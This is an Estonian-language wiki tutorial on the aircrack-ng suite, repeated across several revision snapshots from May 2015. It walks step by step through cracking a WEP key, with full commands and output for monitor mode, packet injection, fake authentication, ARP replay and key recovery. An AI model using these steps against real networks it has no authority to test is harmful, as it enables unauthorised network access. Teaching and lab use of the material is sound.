<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:39:53Z

Ktragel: /* WEP võtme murdmine */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:37:31Z

Ktragel: /* Kasutatud kirjandus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:37:18Z

Ktragel: /* WEP võtme murdmine */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
